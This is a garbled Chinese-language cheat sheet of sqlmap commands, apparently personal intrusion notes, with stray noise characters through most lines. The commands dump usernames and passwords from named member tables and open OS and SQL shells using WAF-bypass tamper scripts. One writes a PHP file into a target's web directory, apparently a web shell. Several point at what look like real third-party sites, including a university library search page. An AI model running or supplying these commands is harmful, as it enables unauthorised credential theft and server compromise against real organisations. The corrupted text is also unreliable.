sqlmap使用实例

admin

/pentest/database/sqlmap
. M& G  m& Y4 o9 Y
; \* C9 `7 g( a3 S1 u# y3 Hupdate :::::>     in the folder   after  execute    following   order : svn update
4 {, f7 K" \: t+ g" R
3 U/ \) E" t  @( N, ]' f. Csqlmap.py -r 1.txt --current-db

/ v1 o% f& k  D! ]  P8 F3 `/ x; Yv 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
' B# `) Z4 e" \5 g/ w4 u
3 g, K! Y; g6 L% T; W# K5 w9 h3 m==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
  F+ z. h; h8 O( \& }# k猜解数据库
$ D) E7 |. f6 g4 ?./sqlmap.py -u "injection-url" --dbs
& x# X) d- t. j: z/ _! jsqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"

猜解表名
7 J4 A  n, m6 j4 m6 x./sqlmap.py -u "injection-url" -D database_name --tables

sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
, b/ z/ _" v# O4 D, M4 v& C! ]
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump

sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
; T$ B5 j" P! c( O7 ?
; i, I/ X+ [' X( s8 I( I! qsqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
3 A: z# f$ v) E4 b+ n$ C6 hsqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
; W6 O' t& i$ V# wsqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
% Z, r- A7 U2 s+ s# F. r; d& V
sqlmap.py -r 1.txt -v 3 --dbs  --batch --tamper "space2morehash.py" 绕过防火墙了
6 R8 T& G" `5 |# Dsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
& S$ P# L5 V6 b6 X8 p
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
猜解列名
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns

. a$ o9 G% C  {& }; \sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
% G" T. m. g; t+ tsqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
" b2 ^* o2 J9 b! B) D  u7 p
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
5 N5 `  \( B& N  [8 ?! U&submit=Go
+ ~& ?/ A6 A5 `( P猜解值
, `2 M) i. [5 v" s" C+ A./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
& V' H3 m: |6 @% A7 f  J; ^4 x========================================================
搜索表名中包括mana字符的
/sqlmap.py -u "injection-url" -T mana --search
6 {3 K/ m$ R9 {% F% Q返回一个交互式sql shell
/sqlmap.py -u "injection-url" --sql-shell
3 n" ^  ?3 m) X读取指定文件（需权限）
* R  I6 G4 E$ `4 k. H& g0 W/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
3 A. c) @4 [. P. p$ k# k0 {查看当前 用户 及 数据库
! u3 A+ W, Q2 @2 M  B/sqlmap.py -u "injection-url" --current-user --current-db
) L' i7 ?$ @$ _+ ]; z5 A2 u本地文件 写入 远程目标绝对路径
3 g0 j3 T5 R1 B/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"

sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
查看某用的权限
/sqlmap.py -u "injection-url" --privileges -U root
1 v. K- ?5 F3 q, o查看当前用户是否为dba
/sqlmap.py -u "injection-url" --is-dba
读取所有数据库用户或指定数据库用户的密码
$ T2 B( j% u: A- y  Y! ^" Lsqlmap.py -r 1.txt --users --passwords
( H" o1 V  p0 m2 }sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
2 b& K2 P' ^) U. ^( `
/sqlmap.py -u "injection-url" --passwords -U root

--start&&--stop 与 --first&&--last 的区别
1 H! j) [0 o6 C7 O& A; k; ^/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump   （--start=1 --stop=2 会列出第二条记录。。。。记录例如：0 1 2 3 ……）

4 M6 o. R9 s# l" `! m; F" m从字典中查找(属于暴利破解)存在的表（sqlmap/txt/common-tables.txt）或字段（sqlmap/txt/common-columns.txt）
: Y) F7 ~4 |3 w+ [* _8 G# h/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
: G: @4 |5 N  g% g4 t
- v1 z6 ]$ c4 R7 I9 }3 a执行sql语句，如查询@@datadir得到数据库路径（或者user()/database()等等……）
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"